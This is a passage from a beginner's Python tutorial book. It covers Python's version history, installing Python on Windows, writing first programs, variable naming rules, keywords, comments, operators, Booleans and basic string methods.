version 2.2, version 2.3 was published in July of 2003. It was
nearly another two years before version 2.4 was released on the
30th of November, 2004. Version 2.5 came less than a year after Python 2.4, in September of 2006. This version introduced the "with" statement, which encloses a code block within a context manager, for instance obtaining a lock before the block is run and releasing it afterward, or opening and then closing a file. The statement makes for behavior similar to RAII (Resource Acquisition Is Initialization) and replaces the typical "try"/"finally" idiom.
The release of version 2.6 on the 1st of October, 2008 was strategically scheduled to coincide with the release of Python 3.0. Aside from the proximity in release dates, version 2.6 also had some new features, like the "warnings" mode, which outlined the use of elements that had been omitted from Python 3.0. Subsequently, in July of 2010, another update to Python 2 was released as Python 2.7. The new version update shared features and coincided in release with version 3.1, the first version update of Python 3. At this time, Python drew an end to the parallel releases of the 2.x and 3.x series, making Python 2.7 the last version update of the 2.x series. Python went public in November of 2014 to announce to its user base that the availability of Python 2.7 would stretch until 2020. However, users were advised to switch to Python 3 at their earliest convenience.
• Python 3.0:
The fourth generation of Python, Python 3.0, otherwise known as Py3K or Python 3000, was published on the 3rd of December 2008. This version was designed to fix fundamental flaws in the design of the scripting language. A new major version number had to be created to implement changes which could not be made while keeping backward compatibility with the by-then redundant 2.x series. The guiding rule for the creation of Python 3 was to limit the duplication of features by taking out old ways of processing things. Otherwise, Python 3 still followed the philosophy with which the previous versions were made. Albeit, as Python had evolved to accumulate new but redundant ways of programming alike tasks, Python 3.0 was emphatically targeted at quelling duplicative modules and constructs, in keeping with the philosophy of having one "and preferably only one" obvious way of doing things. Regardless of these changes, though, version 3.0 remained a multi-paradigm language, even though it didn't share compatibility with its predecessor.
The lack of compatibility meant Python 2.0 code was unable to run on Python 3.0 without proper modification. The dynamic typing used in Python, as well as the intention to change the semantics of certain methods of dictionaries, for instance, made a perfect mechanical conversion from the 2.x series to version 3.0 very challenging. A tool named 2to3 was created to handle the parts of the translation which could be done automatically. It carried out its tasks quite successfully, even though an early review stated that the tool was incapable of handling certain aspects of the conversion process. Following the release of version 3.0, projects that required compatibility with both the 2.x and 3.x series were advised to keep a single source base for the 2.x series and to produce releases for the 3.x platform via the 2to3 tool.
For a long time, editing the generated Python 3.0 code was discouraged because the source was required to keep running on the 2.x series. Now, however, that is no longer necessary, because in 2012 the recommended method became creating a single code base which can run under both the 2.x and 3.x series through compatibility modules. Between December 2008 and July 2019, eight version updates were published under the Python 3.x series. The current version as of the 8th of July 2019 is Python 3.7.4. Within this timeframe, many updates have been made to the programming language, involving the addition of the new features mentioned below:
1. print, which used to be a statement, was changed to an inbuilt function, making it relatively easier to swap out a module that uses different print functions as well as regularizing the syntax. In the late versions of the 2.x series (Python 2.6 and 2.7), print is available as an inbuilt function but is concealed by the print statement syntax, which can be disabled by entering the following line at the top of the file: from __future__ import print_function
2. The [input] function of the Python 2.x series was removed, and the [raw_input] function was renamed to [input]. The change was such that the [input] function of Python 3 behaves like the [raw_input] function of the Python 2.x series, meaning input is always returned in the form of a string rather than being evaluated as an expression.
3. [reduce] was moved out of the in-built namespace into [functools], while [map] and [filter] were exempted and remained built in. The reason behind this change is that operations involving [reduce] are better expressed with an accumulation loop.
4. Added support was provided for optional function annotations, which can be used in informal type declarations as well as for other purposes.
5. The [str]/[unicode] types were unified into a single type representing text, and a separate immutable [bytes] type was introduced alongside a mostly corresponding mutable [bytearray] type, both of which represent arrays of bytes.
6. Backward-compatibility features such as implicit relative imports, old-style classes, and string exceptions were taken out.
7. The integer division functionality changed. For instance, in the Python 2.x series, 5/2 equals 2, while in the 3.x series, 5/2 equals 2.5. In the recent versions of the 2.x series (beginning from version 2.2) as well as in Python 3, the floor division operator gives 5//2 equals 2.
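The division change in item 7 is quick to verify; a minimal sketch, run under Python 3 (a Python 2 interpreter would print 2 for the first expression):

```python
# In Python 3, / is true division and // is floor division.
print(5 / 2)   # 2.5 in Python 3 (Python 2 prints 2 here)
print(5 // 2)  # 2 in both Python 2.2+ and Python 3
```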
In contemporary times, version releases in the 3.x series have all been equipped with substantial new features, and all ongoing development on Python is done in line with the 3.x series.
C. HOW TO DOWNLOAD AND INSTALL PYTHON
In this day and age, being tech-savvy is a demand of the times, and a lack of such knowledge marks one as an outsider. It can result in being left out of the career world, especially in the field of programming.
Numerous big shot companies have employed their own
programmers for purposes of branding, and to cut back on IT
expenses.
In the world of programming, the Python language is found to be easy and programmer-friendly, hence its universal use.
Discussed below is information on how to download Python for MS Windows. In this particular demo, we have chosen Windows because it is the most common worldwide, even in less developed countries. We want to cater to the programming needs of everyone all over the globe.
Python 2.7.17 version was selected because this version bridges the
gap between the old version 2 and the new version 3.
Some of the updated functions/applications of version 3 are still not
compatible with some devices, so 2.7.17 is a smart choice.
Steps in downloading Python 2.7.17, and installing it on
Windows
1. Type python into your browser and press the Search button to display the search results. Scroll down to find the item you are interested in. In this instance, you are looking for Python. Click "Python Releases for Windows", and a new page opens.
2. Select the Python version, python 2.7.17, and click, or
you can select the version that is compatible to your
device or OS.
3. The new page lists the various Python installers. Scroll down and select an option; in this instance, select the Windows x86 MSI installer and click it.
4. Press the Python box at the bottom of your screen.
Click the “Run” button, and wait for the new window to
appear.
5. Select the user options that you require and press "NEXT". Your screen will display the hard drive where your Python will be located.
6. Press the "NEXT" button.
7. Press yes, and wait for a few minutes. Sometimes it
can take longer for the application to download,
depending on the speed of your internet.
8. After that, click the FINISHED button to signify that
the installation has been completed
Python has now been installed on your computer and is ready to use. Find it in drive C, or wherever you saved it.
There can be glitches along the way, but the options presented here should cover them. If you follow the steps carefully, there is no reason you cannot complete this task.
It's important to note that there's no need to compile programs. Python is an interpreted language and executes your commands quickly.
You can also download Python directly from the Python website by selecting either of these versions – 3.8.1 or 2.7.17 – and clicking 'download.'
Follow the step-by-step instructions prompted by the program itself. Save and run the program on your computer.
For Mac
To download Python on Mac, you can follow a similar procedure,
but this time, you will have to access the “Python.mpkg” file, to
run the installer.
For Linux
For Linux, Python 2 and 3 may already be installed by default. Hence, check your operating system first. You can check whether your device already has a Python program by opening your command prompt and entering python --version or python3 --version. If Python is not installed on your Linux system, the result "command not found" will be displayed. You may want to download both Python 2.7.17 and one of the versions of Python 3 for your Linux machine, because Linux tends to have better compatibility with Python 3.
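The version check described above can be sketched as a small shell snippet (the package-manager line in the comment is an assumption for Debian-style systems; use your distribution's equivalent):

```shell
# Print the interpreter version if one is installed;
# otherwise report that Python is missing.
if command -v python3 >/dev/null 2>&1; then
    python3 --version
elif command -v python >/dev/null 2>&1; then
    python --version
else
    echo "Python is not installed"
    # On Debian/Ubuntu you could then run: sudo apt-get install python3
fi
```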
For Windows users, now that you have downloaded the program, you're ready to start.
And yes, congratulations! You can now begin working and having fun with your Python programming system.
Writing The First Python Program
Beginners may find it difficult to start using Python. That's a given, and nothing's wrong with that. However, your desire to learn will make it easier for you to gradually become familiar with the language.
Here are the specific steps you can follow to start using Python.
Steps in using Python
Step #1–Read all about Python.
Python includes README information in your downloaded version. It's advisable to read it first, so you will learn more about the program.
You can start using your Python through the command box (black box), or you can go to your saved file and read the README file first by clicking it.
You can read the content completely if you want to understand more about what the program is, the file setup, and similar information. It is a long document that informs you of how to navigate and use Python. Python also welcomes new contributions for its further development.
You can copy and paste the content of the box into a text document for easier reading.
If you don’t want to know all the other information about Python
and you’re raring to go, you can follow these next steps.
Step #2–Start using Python.
First, open the Python file you have saved on your computer. Click on Python. In some versions, you just click 'python' for the shell to appear.
You can start using Python with the simplest function, which is 'print'. It is the simplest statement or directive of Python: it prints a line or string that you specify.
In Python 2, the print command may or may not be enclosed in parentheses, while in Python 3 you have to enclose what print displays in parentheses.
Example for Python 2:
print “Welcome to My Corner.”
Example for Python 3:
print (“Welcome to My Corner”)
When you press 'enter', the greeting is displayed. You may opt to use a Python shell through IDLE instead.
In the Python 3.5.2 IDLE shell, the text colors are: function (purple), string (green) and result (blue). The string is composed of the words inside the parentheses ("Welcome to My Corner"), while the function is the command word outside the parentheses (print).
You have to use indentation for your Python statements/code. Standard Python code uses four spaces per level; the indentation is used in place of braces to mark blocks.
In some programming languages you usually put semicolons at the end of commands; in Python, you don't need to add semicolons at the end of a statement.
In Python, semicolons are used to separate multiple statements written on the same line.
For version 3, click on your downloaded Python program and save the file on your computer. Then click on IDLE (Integrated Development and Learning Environment), and your shell will appear. You can now start using your Python. It's preferable to use IDLE so that your code can be interpreted directly by IDLE.
Alternative method to open a shell (for some versions)
An alternative method of using your Python is to open a shell through the following steps:
Step #1–Open your menu.
After downloading and saving your Python program on your computer, open your menu and find your saved Python file. You may find it in the downloaded files of your computer or in the folder where you saved it.
Step #2–Access your Python file.
Open your saved Python file (Python 27) by double-clicking it. The contents of Python 27 will appear. Instead of clicking on Python directly, click on Lib.
Step #3–Click on 'idlelib'.
Clicking 'idlelib' will show the folder's contents.
Step #4–Click on idle to show the Python shell.
When you click on any of the 'idle' entries displayed in the menu, the 'white' shell will be displayed.
The difference between the three 'idle' menu entries is that the first two 'idle' commands open the black box (shell) too, while the last 'idle' has only the 'white' box (shell). I prefer the third 'idle' because it's easy to use.
Step #5–Start using your Python shell.
You can now start typing Python functions using the shell. You may have noticed that there are various entries in each of the files that you have opened. You can click and open all of them as you progress in learning more about Python programming.
Python is a programming language that students may study for days or months. Thus, what's presented in this book are the basics for beginners.
The rest of the illustrations assume you are running the Python programs in a Windows environment.
1. Start IDLE.
2. Navigate to the File menu and click New Window.
3. Type the following: print("Hello World!")
4. On the File menu, click Save. Type the name myProgram1.py
5. Navigate to Run and click Run Module to run the program.
The first program that we have written is known as "Hello World!" and is used not only to provide an introduction to a new computer coding language but also to test the basic configuration of the IDE. The output of the program is "Hello World!". Here is what has happened: print() is an inbuilt function, prewritten and preloaded for you, and it displays whatever is contained in the parentheses between the double quotes. The computer will display anything written within the double quotes.
Practice Exercise: Now write and run the following python
programs:
✓ print(“I am now a Python Language Coder!”)
✓ print(“This is my second simple program!”)
✓ print(“I love the simplicity of Python”)
✓ print(“I will display whatever is here in quotes such as
owyhen2589gdbnz082”)
Now we need to write a program with numbers, but before writing such a program we need to learn something about variables and types.
Remember, Python is object-oriented and is not statically typed, which means we do not need to declare variables before using them or specify their type. Let us explain this statement. An object-oriented language simply means that the language supports viewing and manipulating real-life scenarios as groups with subgroups that can be linked and shared, mimicking the natural order and interaction of things. Not all programming languages are object-oriented; for instance, the C programming language is not object-oriented. In programming, declaring variables means that we explicitly state the nature of the variable. A variable can be declared as an integer, long integer, short integer, floating-point number, string, or character, including whether it is accessible locally or globally. A variable is a storage location that takes on different values depending on conditions.
For instance, number1 can take any number from 0 to infinity. However, if we explicitly specify int number1, it means that the storage location will only accept integers and not fractions, for instance. Fortunately or unfortunately, Python does not require us to explicitly state the nature of the storage location (declare variables), as that is left to the Python language itself to figure out.
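A minimal sketch of this idea: the same name can hold values of different types, and Python works out the type at runtime (the variable name here is illustrative):

```python
# No declaration such as "int number1" is needed;
# Python infers the type from the value that is assigned.
number1 = 42            # an integer
print(type(number1))    # <class 'int'>

number1 = 2.5           # the same name can now hold a float
print(type(number1))    # <class 'float'>

number1 = "forty-two"   # or even a string
print(type(number1))    # <class 'str'>
```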
Before tackling types of variables and the rules for writing variables, let us run a simple program to understand what variables are when coding a Python program.
✓ Start IDLE
✓ Navigate to the File menu and click New Window
✓ Type the following:
num1=4
num2=5
sum=num1+num2
print(sum)
✓ On the file, menu click Save. Type the name of
myProgram2.py
✓ Navigate to Run and click Run Module to run the program.
The expected output of this program should be “9” without the
double quotes.
Discussion
At this point, you are eager to understand what has just happened and why print(sum) does not have double quotes like the first programs we wrote. Here is the explanation.
The first line num1=4 means that variable num1(our shortened way
of writing number1, first number) has been assigned 4 before the
program runs.
The second line num2=5 means that variable num2(our shortened
way of writing number2, second number) has been assigned 5
before the program runs.
The computer interprets these instructions and stores the numbers given.
The third line sum=num1+num2 tells the computer to take whatever num1 holds and add it to whatever num2 holds. In other terms, sum the values of num1 and num2.
The fourth line print(sum) means display whatever sum holds. If we put double quotes around sum, the computer will simply display the word sum and not the sum of the two numbers! Remember the cliché that computers are garbage in, garbage out. They follow what you give them!
Note: + is an operator for summing variables and has other uses.
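The quoting distinction can be sketched directly; the name total is used here instead of sum because sum is also the name of a Python built-in function, and shadowing it is best avoided:

```python
num1 = 4
num2 = 5
total = num1 + num2

print(total)    # prints the value the variable holds: 9
print("total")  # prints the literal word between the quotes: total
```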
Now let us try three exercises involving numbers before we explain the types of variables and the rules for writing variables, so that you get more freedom to play with variables. Remember, variable values vary; for instance, num1 can take 3, 8, 1562, or 1.
Follow the steps of opening Python IDE and do the following:
✓ The output should be 54
num1=43
num2=11
sum=num1+num2
print(sum)
✓ The output should be 167
num1=101
num2=66
sum=num1+num2
print(sum)
✓ The output should be 28
num1=9
num2=19
sum=num1+num2
print(sum)
1. Variables
We have used num1, num2, and sum, and these variable names were not just random; they must follow certain rules and conventions. Rules are what we cannot violate, while conventions are much like the recommended way. Let us start with the rules:
The Rules of When Naming Variables in Python
1. Variable names should always start with a letter or an underscore, i.e.
num1
_num1
2. The remaining part of the variable name may consist of numbers, letters, and underscores, i.e.
number1
num_be_r
3. Variable names are case sensitive, meaning that capital letters and non-capital letters are treated differently. Num1 will be treated differently from num1.
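Rule 3 can be checked in a couple of lines; Num1 and num1 are two independent variables:

```python
num1 = 10
Num1 = 99  # a different variable despite the similar spelling

print(num1)  # 10
print(Num1)  # 99
```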
Practice Exercise
Write/suggest five variables for:
✓ Hospital department.
✓ Bank.
✓ Media House.
Given scri=75, scr4=9, sscr2=13, Scr=18:
✓ The variable names above are supposed to represent the scores of students. Rewrite the variables to satisfy Python variable rules and conventions.
2. Conventions When Naming Variables in Python
As earlier indicated, conventions are not rules per se; they are established traditions that add value and readability to the way we name variables in Python.
❖ Uphold readability. Your variables should give a hint of what they are handling, because programs are meant to be read by people other than the person writing them.
number1 is easy to read compared to n1. Similarly, first_name is easy to read compared to firstname, firstName, or fn. The implication of all this is that both forms are valid/acceptable variables in Python, but the convention pushes us to write them in an easy-to-read form.
❖ Use descriptive names when writing your variables. For instance, number1 as a variable name is descriptive compared with yale or mything. In other words, we could use yale to capture values for number1, but the name does not outright hint at what we are doing. Remember, when writing programs, assume another person will maintain them. That person should be able to quickly figure out what the program is all about before running it.
❖ To avoid confusion, avoid using the uppercase letter 'O', the lowercase letter 'l', and the uppercase letter 'I' on their own, because they can be confused with the digits 0 and 1. In other terms, using these letters does not violate the rules for writing variables, but their use as variable names will breed confusion.
Practice Exercise 1
Re-write the following variable names to (1) be valid variable
names and follow (2) conventions of writing variable names.
✓ 23doctor
✓ line1
✓ Option3
✓ Mydesk
✓ #cup3
Practice Exercise 2
Write/Suggest variable names that are (1) valid and (2)
conventional.
✓ You want to sum three numbers.
✓ You want to store the names of four students.
✓ You want to store the names of five doctors in a hospital.
3. Keywords and Identifiers in the Python Programming Language
At this point, you have been wondering why you must use print and str in that manner without the freedom or knowledge of why the stated words have to be written that way. The words print and str constitute a special type of words that always have to be written that way. Each programming language has its own set of keywords, and in most cases some keywords are found across several programming languages. Keywords are case sensitive in Python, meaning that we must always type them in their exact form. Keywords cannot be used as the name of a function (we will explain what a function is later) or the name of a variable.
There are 33 keywords in Python, and all are in lowercase save for None, False, and True. They must always be written as they appear below:
False, None, True, and, as, assert, break, class, continue, def, del, elif, else, except, finally, for, from, global, if, import, in, is, lambda, nonlocal, not, or, pass, raise, return, try, while, with, yield
Note: print() and str are functions, but they are inbuilt/preloaded functions in Python. Functions are a set of rules and methods that act when invoked; for instance, the print function will display output when activated/invoked/called. At this point, you have not encountered all of the keywords, but you will meet them gradually. Take time to skim through, read, and try to recall as many as you can.
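If you want Python itself to list its reserved words, the standard library's keyword module exposes them (newer interpreters may report more than 33, since keywords such as async and await were added later):

```python
import keyword

# kwlist holds every reserved word of the running interpreter.
print(keyword.kwlist)
print(len(keyword.kwlist))

# A keyword cannot be used as a variable name; compiling such a
# statement raises a SyntaxError, which we can catch safely here.
try:
    compile("for = 1", "<example>", "exec")
except SyntaxError:
    print("'for' cannot be used as a variable name")
```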
Practice Exercise
Identify what is wrong with the following variable names (this exercise requires recalling what we have learned so far):
✓ for=1
✓ yield=3
✓ 34ball
✓ m
4. Comments and Statements
Statements in Python
A statement in Python refers to an instruction that the Python interpreter can work on/execute. Examples are str='I am a Programmer' and number1=3. A statement having an equal sign (=) is known as an assignment statement. There are other types of statements, such as if, while, and for, which will be handled later.
Practice Exercise
✓ Write a Python statement that assigns the first number a value of 18.
✓ Write a programming statement that assigns the second number a value of 21.
✓ What type of statements are a. and b. above?

5. Multi-Line Python Statement


It is possible to spread a statement over multiple lines. Such a
statement is known as a multi-line statement. The termination of a
programming statement is denoted by a newline character. To
spread a statement over several lines in Python, we use the
backslash (\), known as the line continuation character. An example
of a multi-line statement is:
sum=3+6+7+\
9+1+3+\
11+4+8
The example above is also known as an explicit line continuation.
In Python, statements inside square brackets [], parentheses (round
brackets) (), and braces {} may also continue across lines; this is
known as implicit line continuation.

The above example can be rewritten as


sum=(3+6+7+
9+1+3+
11+4+8)
Note: We have dropped the backslash (\), the line continuation
character, when we use the parentheses (round brackets) because the
parentheses are doing the work that the \ was doing.
Question: Why are multi-line statements necessary when we could
simply write a single line and the program statement would run
just fine?
Answer: Multi-line statements can help improve
formatting/readability of the entire program. Remember, when
writing a program always assume that it is other people who will
use and maintain it without your input.
Practice Exercise:
Rewrite the following program statements using continuation
techniques such as \, [], () or {} to improve the readability of the
program statements.

total=2+9+3+6+8+2+5+1+14+5+21+26+4+7+13+31+24
count=13+1+56+3+7+9+5+12+54+4+7+45+71+4+8+5
Semicolons can also be used to place multiple statements on a
single line. Assume we have to assign and display the ages of four
employees in a Python program. The assignments could be written as:
employee1=25; employee2=45; employee3=32; employee4=43
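Putting the pieces together, here is a small sketch showing explicit continuation, implicit continuation, and semicolon-separated statements (the numbers are arbitrary):

```python
# Explicit line continuation with the backslash:
total = 2 + 9 + 3 + \
        6 + 8

# Implicit line continuation inside parentheses:
count = (13 + 1 + 56 +
         3 + 7)

# Several statements on one line, separated by semicolons:
employee1 = 25; employee2 = 45

print(total)      # 28
print(count)      # 80
print(employee1, employee2)
```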

6. Indentation in Python
Indentation is used to group program lines into a block in
Python. The amount of indentation to use depends entirely on the
programmer. However, it is important to ensure consistency. By
convention, four whitespaces (spaces) are used for indentation
instead of tabs.
Indentation in Python also helps make the program look neat and
clean, and it creates consistency. However, when performing
line continuation, indentation can be ignored. Incorrect indentation
will create an indentation error. A correct Python program with poor
indentation may still run, but it will not be neat and consistent from
a human readability point of view.
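As a minimal illustration (using a for loop, which is covered in detail later), the indented line belongs to the loop's block and the unindented line does not:

```python
# The line indented by four spaces is inside the loop block.
for number in [1, 2, 3]:
    print(number)       # runs once per item in the list
print('Done')           # unindented: runs once, after the loop finishes
```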

7. Comments in Python
When writing python programs and indeed any programming
language, comments are very important. Comments are used to
describe what is happening within a program. It becomes easier for
another person taking a look at a program to have an idea of what
the program does by reading the comments in it. Comments are
also useful to a programmer as one can forget the critical details of
a program they wrote. The hash (#) symbol is placed before a
comment in Python, and the comment extends up to the newline
character. The Python interpreter ignores comments; they are meant
for programmers to understand the program better.
Example

Start IDLE
Navigate to the File menu and click New Window
Type the following:
#This is my first comment
#The program will print Hello World
print('Hello World') #print is an inbuilt function used to
display output

On the File menu, click Save. Type the name myProgram5.py
Navigate to Run and click Run Module to run the program
Practice Exercise
This exercise integrates most of what we have covered so far.
✓ Write a program to sum two numbers 45, and 12 and include
single line comments at each line of code.
✓ Write a program to show the names of two employees where
the first employee is “Daisy” and the second employee is
“Richard”. Include single comments at each line of code.
✓ Write a program to display the student registration numbers
where the student names and their registration are: Yvonne=235,
Ian=782, James=1235, Juliet=568.

Multi-Line Comments
Just like multi-line program statements we also have multi-line
comments. There are several ways of writing multi-line comments.
The first approach is to type the hash (#) at each comment line
starting point.

For Example
Start IDLE.
Navigate to the File menu and click New Window.
Type the following:
#I am going to write a long comment line
#the comment will spill over to this line
#and finally end here.
The second way of writing multi-line comments involves using
triple single or double quotes: ''' or """. In Python, triple quotes
are used for multi-line strings and multi-line comments. Caution:
when a triple-quoted string is used as a docstring, it is kept as part
of the program rather than discarded, but we do not have to worry
about this at this stage.
Example:
Start IDLE.
Navigate to the File menu and click New Window.
Type the following:
"""This is also a great
illustration of
a multi-line comment in Python"""

Summary
Variables are storage locations that a user specifies before writing
and running a Python program. Variable names are labels of those
storage locations. A variable holds a value depending on
circumstances. For instance, doctor1 can be Daniel, Brenda or Rita.
Patient1 can be Luke, William or Kelly. Variable names are written
by adhering to rules and conventions. Rules are a must while
conventions are optional but recommended as they help write
readable variable names. When writing a program, you should
assume that another person will examine or run it without your
input and thus should be well written. In programming, declaring
variables means that we explicitly state the nature of the variable.
The variable can be declared as an integer, long integer, short
integer, a floating-point number, a string, or a character, as well as
whether it is accessible locally or globally. A variable is a storage
location whose value changes depending on conditions. Use descriptive
names when writing your variables.
The Python Operators

While we are here, we want to look at the topic of the Python
operators and what they are able to do in our code. As we go through
some of the programs that a beginner writes throughout this
guidebook, you will find that these operators are pretty common and
that we use them on a regular basis. There are actually a number of
operators, but we are able to split them up into a few different types
based on our needs. Some of the different operators that we are able
to work with include:

1. The arithmetic operators. These are the ones that will
allow you to complete some mathematical operations
inside of your code, such as addition or subtraction.
You can simply add together two operands in the code,
subtract them, multiply them, or divide them and work
from there. These can be used in many of the different
programs that you will want to write along the way. Some
of the options that you will be able to use when it comes
to the arithmetic operators include:

1. (+): this is the addition operator, and it is responsible
for adding together both of your values.

2. (-): this is the subtraction operator, and it is
responsible for subtracting the right operand
from the left.

3. (*): this is the multiplication operator, and it is used
to multiply two or more values in the equation.

4. (/): this is the division operator, and it divides
the value of the left operand by that on the right and
gives you the answer.
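A minimal sketch of the four arithmetic operators in action (any values would do):

```python
a = 10
b = 4
print(a + b)   # 14: addition
print(a - b)   # 6: subtraction
print(a * b)   # 40: multiplication
print(a / b)   # 2.5: division (always yields a float in Python 3)
```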

2. Comparison operators: We are also able to work with
the comparison operators. These are going to be a good
option when we would like to take two or more parts of
the code, such as statements or values, and then
compare them with one another. Comparisons rely on
Boolean expressions to help us get things done, because
they give us true or false answers along the way. So, the
statements that you are comparing will either be true or
false based on how they compare.

1. (>=): this one checks whether the operand on the left
is greater than or equal to the value of the one on the
right.

2. (<=): this one checks whether the value of the
operand on the left side is less than or equal
to the one on the right.

3. (>): this one checks whether the value on the
left side is greater than the value on the right side.

4. (<): this one checks whether the value on the
left side is less than the value on the right side.

5. (!=): this is the not-equal-to operator.

6. (==): this is the equal-to operator.
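Each comparison returns a Boolean value, as this short sketch shows:

```python
x = 7
y = 12
print(x >= y)   # False
print(x <= y)   # True
print(x > 3)    # True
print(x < 3)    # False
print(x != y)   # True
print(x == 7)   # True
```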

3. The logical operators: The next option is going to be
the logical operators. These ones are often not used
until we get to some of the more advanced code that
you may write later. These operators evaluate the
input that a user gives you against any of the
conditions that you decide to set in the code, and there
are three of them that can be used to help us with this
goal.

1. Or: with x or y, the compiler evaluates x first; if x is
false, it then goes over and evaluates and returns y. If x
ends up being true, the compiler returns the evaluation
of x without looking at y.

2. And: with x and y, if x ends up being false, the
compiler returns x without evaluating y. If x ends up
being true, it moves on and evaluates and returns y.

3. Not: if x ends up being false, not x returns
True. But if x ends up being true, not x
returns False.
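The behavior described above can be checked directly; note that Python's `or` and `and` return one of their operands rather than always a bare True/False:

```python
# 'or' returns the left operand if it is truthy, otherwise the right one.
print(True or False)    # True
print(0 or 'fallback')  # fallback: 0 is falsy, so the right side is returned

# 'and' returns the left operand if it is falsy, otherwise the right one.
print(False and True)   # False: the right side is never evaluated
print(3 and 5)          # 5: 3 is truthy, so the right side is returned

# 'not' always returns a plain Boolean.
print(not True)         # False
print(not 0)            # True
```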

4. Assignment operators: And finally, we are going to
take a look at the assignment operators. These are
used all of the time, and we have actually already
seen them in some code. The assignment operator is
simply an equals sign: it takes a value and assigns it
over to one of your variables. You can assign any value
you want to any variable, as often as you would like;
just make sure that the equals sign is in the
right place.
These operators are going to be important to the code that you
write for many reasons, depending on what you are
hoping to accomplish in the programs that you are writing
along the way. Take some time to look these over and learn a bit
more about these operators and how you are able to use them in
your own code for the best results.
Basic Data Types in Python
What Are Data Types?
We know that variables are used to store the data we use in our
Python programs. But, how do these variables actually work?
Each system has a Random-Access Memory (RAM), which is used
to store temporary data. When we declare a variable as such:
x = 10
What happens in the back is that Python reserves a small segment
of our RAM for us and it is used to store that value.
But, how does the Python interpreter decide how much space to
allocate for our variable? This allocation of space is dependent on
the size of the variable, which in turn, is dependent on the data type
of the variable.
To make our program more efficient and faster, we need to assign
memory carefully and use the right data types for our variables.
Booleans
One of the simplest data types in Python and other programming
languages is the bool or the Boolean data type.
A Boolean variable can only have two possible values; True or
False. Such variables are used commonly to test for conditions.
For example, if you wish to track whether the web server is on in
your Python program, you could write something like:

1. webServerOpen = True
2. lockdownState = False
3. underMaintenance = False
If you are unsure about the data type of a variable, Python allows
you to easily access the data type using the type() function.
If you run the following code next,

1. print(type(webServerOpen))
2. print(type(lockdownState))
You will get the following output:

<class 'bool'>
<class 'bool'>
The function returns the data type of the variable which is sent
inside its parenthesis. The values inside the parenthesis are called
arguments. Here, ‘bool’ represents a Boolean variable.
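The same type() function works on any value, so you can probe the other data types we will meet shortly:

```python
webServerOpen = True
print(type(webServerOpen))   # <class 'bool'>
print(type('hello'))         # <class 'str'>
print(type(3))               # <class 'int'>
print(type(3.5))             # <class 'float'>
```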
Strings
Remember, in our first program, when we printed “Hello World!”.
We called it a phrase or text which is not built into Python but can
be used to convey messages from the user. This text or similar
phrases are called Strings in programming languages.
Strings are nothing more than a series of characters. Whenever you
see something enclosed with double quotation marks or single
quotation marks, the text inside is considered a string.
For example, these two variables that I’ve just declared are both
Strings and perfectly valid.

1. a = "This is an example of a string and I'm using double quotation marks"
2. b = 'This is also an example of strings and now, I am using single quotation marks'
What does this flexibility offer? If you take a look at variable 'a',
I've used a contraction, so a single quotation mark appears inside my
string (which is delimited by double quotation marks).
Here are a few examples of quotes and sentences where I’ve used
contractions:

1. string1 = "I'm an amazing person"


2. string2 = 'I told him, "Work hard!"'
String Methods
Methods are simple actions that we can ask the Python interpreter
to take for us. Methods require variables or a piece of data on
which they can work and produce the desired result. Let’s first
write some code and we’ll explore it as we go.
Changing the Case of Strings:
Create a new file called stringMethods.py (or alternatively use
IDLE) and run the following code:

1. username = 'john doe'
2. print(username.title())
If you run the code, you should get this output:
John Doe
In the first line, we declare our variable and assign a string to it. In
the second line, we start by printing something. In the parenthesis
of the print function, we use the method title() on our variable.
Methods let us perform an action on our data. In this case, the title
method displays each word of our variable in capital letters. Since
the method acts on our variable, we connect the variable to the
method using a period or ‘.’ symbol.
Methods are identified by their set of parentheses, which can take in
additional information needed to act on the variables they are
connected to. Since the title method doesn't need any other
information, its parentheses are empty.
To deal with character casing, several other methods are available.
Let’s test the upper() and lower() method by adding the following
code to your file. Then, run it:
username2 = 'John Doe'
print(username2.upper())
print(username2.lower())
The output of these methods should be:
JOHN DOE
john doe
So, the upper method capitalizes each word, whereas, the lower
method converts all characters to lowercase letters.
Concatenating and Combining Strings:
At times your program might require users to input their first name,
middle name, and then the last name. But, when you display it
back, these names are combined together.
So, how do we concatenate strings? It's simple. The "+" symbol is
called the concatenation operator and is used to join strings
together.

Take a look at the following code:

1. firstName = "John"
2. middleName = "Adam"
3. lastName = "Doe"
4. fullName = firstName + " " + middleName + " " + lastName
5. print(fullName)
What’s the output? John Adam Doe
If you want to run some other methods on the output, feel free.
Here's a program which runs some tests on the variables:
firstName = "John"
middleName = "Adam"
lastName = "Doe"
fullName = firstName + " " + middleName + " " + lastName
print(fullName.lower())
message = "The manager, " + fullName.title() + ", is a good person."
print(message)
What would be the output? For the first print statement:
john adam doe – all lowercase letters. For the second print
statement:
The manager, John Adam Doe, is a good person. – a concatenation
that includes a string on which a method was applied.
So, you can use these methods on every string in your program and
it will output just fine.

Adding Whitespaces:
Whitespaces refer to the characters which are used to produce
spacing in between words, characters, or sentences using tabs,
spaces, and line breaks. It's better to use whitespace properly
so the outputs are readable for users.
To produce whitespaces using tabs, use this combination of
characters ‘\t’. Here’s an example to show you the difference with
and without the tab spacing.

1. print("This is without a tab spacing!")


2. print("\t This is with a tab spacing!")
Notice the difference in the output? Here’s the output of the two
lines above.
This is without a tab spacing!
     This is with a tab spacing!
To add new text to new lines, you can add a line break using the
combination ‘\n’. Here’s an example to show you the difference a
line break adds:

1. print('I love the following weathers: SummerWinter')


2. print('I love the following
weathers:\nSummer\nWinter')
Once again, which output is more readable? Take a look at the
outputs.

1. I love the following weathers: SummerWinter


2. I love the following weathers:
Summer
Winter
You can use both tabs, spaces, and newlines together and it would
work just fine. Here's an example program to cater to both new
lines and tabs being used together.
print("I love these weathers:\n\tSummer\n\tWinter")
Here's the output of the command:
I love these weathers:
     Summer
     Winter
Removing or Stripping the Whitespace:
To you, the phrases 'code' and 'code ' look the same, right? To the
computer, however, they are two very different strings. It treats the
extra space as part of the string until told otherwise.
Where does this produce a problem? When you are about to
compare two strings to check if 'code' and 'code '
are equal, you will think the result is True, but the interpreter will
always return False.
If you think your string has extra space to the right side of the
string, use the rstrip() method. Let’s take a look at an example. I’ll
declare a variable, show you the whitespace, and then remove it to
see the difference. Here’s the code:
favoriteWeather = "Summer "
print(favoriteWeather + "is lovely")
favoriteWeather.rstrip()
print(favoriteWeather + "is lovely")
If you run these statements, you might expect the following output:
Summer is lovely
Summeris lovely

Did you expect this output? Here's the actual output:

Summer is lovely
Summer is lovely
This is because the effect of rstrip() is temporary. Sure, it does
remove the whitespace, but to make the removal permanent, you need to
reassign the result to the original variable. Here's the same
example, continued to explain this concept:
favoriteWeather = "Summer "
print(favoriteWeather + "is lovely")
favoriteWeather = favoriteWeather.rstrip()
print(favoriteWeather + "is lovely")
